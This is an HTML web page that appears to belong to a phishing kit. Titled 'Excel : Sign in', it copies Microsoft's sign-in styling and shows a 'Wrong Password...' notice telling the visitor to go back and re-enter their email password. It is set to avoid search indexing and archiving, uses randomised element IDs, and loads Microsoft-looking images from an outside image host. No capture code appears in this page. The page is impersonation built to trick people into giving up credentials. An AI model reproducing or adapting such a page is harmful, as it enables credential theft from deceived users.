<html>
<head>
<meta name="robots" content="noimageindex, nofollow, nosnippet, noindex, noarchive, nocache, notranslate, noyaca">
<title>Excel : Sign in</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" type="image/png" href="https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png">
</head>
<body>
<style>
body {
    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
    font-size: 15px;
    line-height: 20px;
    font-weight: 400;
    font-size: .9375rem;
    line-height: 1.25rem;
    color: #262626;
    margin: 0;
    height: 100%;
    overflow: hidden;
}

#sub {
    background-image: url(https://i.gyazo.com/52a11ae9fe6936093d1a147ffb24ad16.png);
    background-repeat: no-repeat, no-repeat;
    background-size: cover, cover;
    position: fixed;
    top: 0;
    width: 100%;
    height: 100%;
}

#sD43aB {
    background: #fff;
    width: 100%;
    padding: 50px 40px;
    max-width: 260px;
    margin: 8% auto 18px;
}

#tResdD {
    margin: 15px 0;
    line-height: 1.75rem;
    color: #1b1b1b;
    font-size: 1.5rem;
    font-weight: 600;
    font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
}

.input:focus {
    border-color: #00f;
    outline: 0;
}

.next {
    float: right;
    background-color: #0067b8;
    color: #fff;
}

.btn {
    width: 108px;
    height: 32px;
    border: none;
    cursor: pointer;
    touch-action: manipulation;
    font-size: 15px;
}

.next:hover {
    background-color: #035ea6;
}

a {
    color: #0067b8;
    text-decoration: none;
    font-size: 13px;
}

#footer {
    position: fixed;
    bottom: 0;
    text-align: right;
    width: 100%;
    right: 5px;
    padding: 5px;
    font-size: 10px;
}

.fsbRTe {
    text-decoration: none;
    letter-spacing: 3px;
    line-height: 25px;
    vertical-align: bottom;
    font-size: 16px;
    font-weight: 600;
    color: #000;
}
</style>


<div id="main">
    <div id="sub">
        <div id="sD43aB">
            <div id="spinner" class="spinner" style="display:none;"><div></div><div></div><div></div><div></div></div>
            <img src='https://i.gyazo.com/0dcf5bc75c17513b4d7c2d958771d294.jpg=CAU'class="img-fluid" width="80px"></span><span class="pl-4 h5 align-middle">
            <div id="page1">
                <div id="tResdD">Wrong Password... </div>
                <span id="error" style="color:#e81123;display:none"></span>
                <form id="sign_in_4d4fb83be3" action="javascript:history.back()" accept-charset="UTF-8" method="post">
                    <input name="utf8" type="hidden" value="✓">
                    <input type="hidden" name="authenticity_token" value="">
                    <div class="row" style="margin:15px 0">
                        <font style="font-size: .8125rem;">&nbsp;Unfortunately, we can't log you in because the email password you entered is incorrect. Please go back and try again.</font>
                    </div>
                    <input type="submit" class="btn next" value="Go Back" style="">
                    <p style="margin:15px">&nbsp;</p>
                </form>
            </div>
        </div>
    </div>
</div>

</body>
</html>
